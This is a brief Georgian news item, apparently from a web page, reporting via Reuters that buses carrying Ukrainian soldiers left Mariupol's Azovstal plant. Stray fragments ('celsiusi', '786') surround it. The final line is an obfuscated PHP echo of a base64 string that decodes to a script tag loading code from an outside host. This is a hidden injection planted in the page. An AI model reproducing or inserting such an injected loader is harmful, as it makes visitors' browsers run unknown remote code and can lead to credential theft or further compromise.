celsiusi
ავერსი საქკაბელი
მარიუპოლში მდებარე „აზოვსტალის“ ქარხნის ტერიტორია დაახლოებით ათმა ავტობუსმა დატოვა, რომელშიც უკრაინელი სამხედროები იმყოფებოდნენ, – შესაბამის ინფორმაციას სააგენტო „როიტერი“ თვითმხილველზე დაყრდნობით ავრცელებს.
 
როგორც მედიასაშუალება აღნიშნავს, უცნობია, რამდენი სამხედრო იმყოფებოდა ავტობუსებში, რომლებმაც ქარხნის ტერიტორია დატოვეს.
 
აღსანიშნავია, რომ უკრაინულ მედიაში გავრცელდა ინფორმაცია, რომ „აზოვსტალიდან“ მძიმედ დაჭრილი უკრაინელი სამხედროების ევაკუაცია განხორციელდა. მედიის ცნობით, ისინი დატყვევებულ რუს სამხედროებში გაცვალეს. თუმცა აღნიშნულ საკითხზე უკრაინულ მხარეს ოფიციალური განცხადება არ გაუკეთებია.
786
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");